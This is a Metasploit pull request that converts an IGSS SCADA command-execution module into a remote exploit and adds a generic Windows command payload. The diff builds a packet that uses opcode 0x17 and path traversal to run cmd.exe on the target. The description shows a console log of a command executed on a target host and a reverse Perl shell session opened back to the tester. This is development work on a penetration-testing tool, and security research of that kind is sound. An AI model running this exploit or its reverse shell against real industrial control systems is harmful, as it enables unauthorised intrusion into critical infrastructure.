### PR TITLE
Support Windows CMD generic payload

### DIFF
--- a/modules/exploits/windows/scada/igss_exec_17.rb
+++ b/modules/exploits/windows/scada/igss_exec_17.rb
@@ -7,11 +7,9 @@
 
 require 'msf/core'
 
-class Metasploit3 < Msf::Auxiliary
+class Metasploit3 < Msf::Exploit::Remote
 
-  require 'msf/core/module/deprecated'
-  include Msf::Module::Deprecated
-  deprecated Date.new(2013, 12, 17), 'exploit/windows/scada/igss_exec_17'
+  Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
 
@@ -24,7 +22,11 @@ class Metasploit3 < Msf::Auxiliary
         flaw, if opcode 0x17 is sent to the dc.exe process, an attacker
         may be able to execute arbitrary system commands.
       },
-      'Author'         => [ 'Luigi Auriemma', 'MC' ],
+      'Author'         =>
+        [
+          'Luigi Auriemma',
+          'MC'
+        ],
       'License'        => MSF_LICENSE,
       'References'     =>
         [
@@ -32,20 +34,32 @@ class Metasploit3 < Msf::Auxiliary
           [ 'OSVDB', '72349'],
           [ 'URL', 'http://aluigi.org/adv/igss_8-adv.txt' ],
         ],
+      'Platform'       => 'win',
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'Space'       => 153,
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          [ 'Windows', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'Privileged'     => false,
       'DisclosureDate' => 'Mar 21 2011'))
 
     register_options(
       [
-        Opt::RPORT(12397),
-        OptString.new('CMD', [ false, 'The OS command to execute', 'echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
+        Opt::RPORT(12397)
       ], self.class)
   end
 
-  def run
+  def exploit
+
+    print_status("Sending exploit packet...")
 
     connect
-
-    exec = datastore['CMD']
 
     packet =  [0x00000100].pack('V') + [0x00000000].pack('V')
     packet << [0x00000100].pack('V') + [0x00000017].pack('V')
@@ -54,10 +68,9 @@ class Metasploit3 < Msf::Auxiliary
     packet << [0x00000000].pack('V') + [0x00000000].pack('V')
     packet << [0x00000000].pack('V')
     packet << "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\"
-    packet << "windows\\system32\\cmd.exe\" /c #{exec}"
-    packet << "\x00" * (143 + exec.length)
+    packet << "windows\\system32\\cmd.exe\" /c #{payload.encoded}"
+    packet << "\x00" * (143) #
 
-    print_status("Sending command: #{exec}")
     sock.put(packet)
     sock.get_once(-1,0.5)
     disconnect

--- a/modules/payloads/singles/cmd/windows/generic.rb
+++ b/modules/payloads/singles/cmd/windows/generic.rb
@@ -1,0 +1,57 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/find_shell'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Windows Command, Generic Command Execution',
+      'Description'   => 'Executes the supplied command',
+      'Author'        => 'hdm',
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'win',
+      'Arch'          => ARCH_CMD,
+      'Handler'       => Msf::Handler::None,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'cmd',
+      'RequiredCmd'   => 'generic',
+      'Payload'       =>
+        {
+          'Offsets' => { },
+          'Payload' => ''
+        }
+      ))
+
+    register_options(
+      [
+        OptString.new('CMD', [ true, "The command string to execute" ]),
+      ], self.class)
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    return super + command_string
+  end
+
+  #
+  # Returns the command string to use for execution
+  #
+  def command_string
+    return datastore['CMD'] || ''
+  end
+
+end


### PR DESCRIPTION
This module adds Windows CMD generic payload (which mimics the unix one). 

With cmd generic payload should be easier avoid auxiliary modules or exploits with a CMD datastore option to just execute a command. 

If there is the ability to execute commands the way to proceed is normally with an exploit, executing a payload, and doing the specific analysis of payload length available and badchars.

In order to test the windows cmd payload I've converted the auxiliary module auxiliary/admin/scada/igss_exec_17 to an ARCH_CMD exploit. In this way windows cmd payloads, which fulfill the payload requirements, can be sued. In the next example both the cmd/windows/generic and cmd/windows/reverse_perl payloads are used:

```
msf exploit(igss_exec_17) > set payload cmd/windows/generic 
payload => cmd/windows/generic
msf exploit(igss_exec_17) > set CMD echo "pwned" > c:\\\\pwned.txt
CMD => echo pwned > c:\\pwned.txt
msf exploit(igss_exec_17) > rexploit
[*] Reloading module...

[*] Sending exploit packet...
msf exploit(igss_exec_17) > set payload cmd/windows/reverse_perl 
payload => cmd/windows/reverse_perl
msf exploit(igss_exec_17) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Sending exploit packet...
[*] Command shell session 3 opened (192.168.172.1:4444 -> 192.168.172.244:1293) at 2013-10-17 13:52:03 -0500


type c:\\pwned.txt
pwned 
^C
Abort session 3? [y/N]  y

[*] 192.168.172.244 - Command shell session 3 closed.  Reason: User exit
msf exploit(igss_exec_17) > 

```

This pull request also should help to #2536, which is another exploit including CMD as datastore option to avoid the payload.

Feedback here is super welcome. 
